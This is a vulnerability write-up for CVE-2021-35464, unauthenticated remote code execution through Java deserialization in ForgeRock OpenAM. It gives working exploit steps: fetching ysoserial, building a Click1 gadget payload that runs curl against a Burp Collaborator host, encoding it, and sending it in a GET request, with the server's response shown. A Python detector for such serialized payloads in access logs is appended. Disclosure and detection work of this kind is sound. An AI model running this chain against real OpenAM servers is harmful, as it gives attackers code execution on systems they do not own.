RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM.
An unauthenticated, third-party attacker can execute code remotely.
ββββ
ForgeRock OpenAM
CVE-2021-35464
First we need to build the payload:
wget https://github.com/Bin4xin/sweet-ysoserial/blob/master/target/ysoserial-0.0.6-SNAPSHOT-all.jar
then
java -jar ysoserial-master-SNAPSHOT.jar Click1 "curl https://g0h7qcjzwzpzdh2ar6b5f9x3puvkj9.burpcollaborator.net" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' | tr -d '\n' > payload.txt
Replace the Burp Collaborator ID with your own to test it properly.
The payload is now saved in the payload.txt file.
Now send the following request:
GET /ββββββββββ=XYZ HTTP/1.1
Host: 127.0.0.1
Replace XYZ with the payload saved in the payload.txt file.
The response:
HTTP/1.1 302 Found
Cache-Control: private
Location: https://127.0.0.1:443/openam/base/AMInvalidURL
Content-Length: 0
The HTTP request sent to the Collaborator:
βββ
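As an added example (not part of the original write-up), a small Python detector for the payload shape built above: a URL-safe base64 value, padding stripped, that decodes to a Java serialization stream (optionally preceded by the NUL byte the pipeline prepends). It scans constructed access-log request lines; the paths and parameter names in the sample are assumptions, not the real vulnerable endpoint.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Java serialization stream header: STREAM_MAGIC 0xACED followed by STREAM_VERSION 0x0005.
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"


def decode_urlsafe_b64(value):
    """Decode URL-safe base64 with padding stripped, as produced by tr '/+' '_-' | tr -d '='."""
    cleaned = re.sub(r"[^A-Za-z0-9_\-]", "", value)
    if len(cleaned) < 8:  # too short to hold the magic; skip short tokens and flags
        return None
    padded = cleaned + "=" * (-len(cleaned) % 4)
    try:
        return base64.urlsafe_b64decode(padded)
    except (binascii.Error, ValueError):
        return None


def looks_like_java_serialized(blob):
    """True if the bytes start with the stream magic, with or without the leading NUL byte."""
    return blob.startswith(JAVA_SERIAL_MAGIC) or blob.startswith(b"\x00" + JAVA_SERIAL_MAGIC)


def suspicious_params(request_line):
    """Return the names of query parameters in an access-log request line carrying a serialized Java object."""
    parts = request_line.split(" ", 2)
    if len(parts) < 2:
        return []
    query = urlsplit(parts[1]).query
    return [
        name
        for name, value in parse_qsl(query, keep_blank_values=True)
        if (blob := decode_urlsafe_b64(value)) is not None and looks_like_java_serialized(blob)
    ]


# Constructed sample: header bytes plus filler, NOT a real gadget chain, encoded the same way as payload.txt.
_CONSTRUCTED_BLOB = b"\x00" + JAVA_SERIAL_MAGIC + b"constructed-filler-bytes"
CONSTRUCTED_VALUE = base64.urlsafe_b64encode(_CONSTRUCTED_BLOB).decode().rstrip("=")

# Constructed access-log request lines (hypothetical paths and parameter names).
SAMPLE_REQUEST_LINES = [
    "GET /openam/example/page?status=aGVsbG8gd29ybGQ HTTP/1.1",
    "GET /openam/example/page?state=" + CONSTRUCTED_VALUE + "&lang=en HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUEST_LINES:
        print(suspicious_params(line), line)
```

Run it over real access logs line by line; a hit means a client submitted a serialized Java object in a query parameter, which is worth alerting on regardless of which endpoint received it.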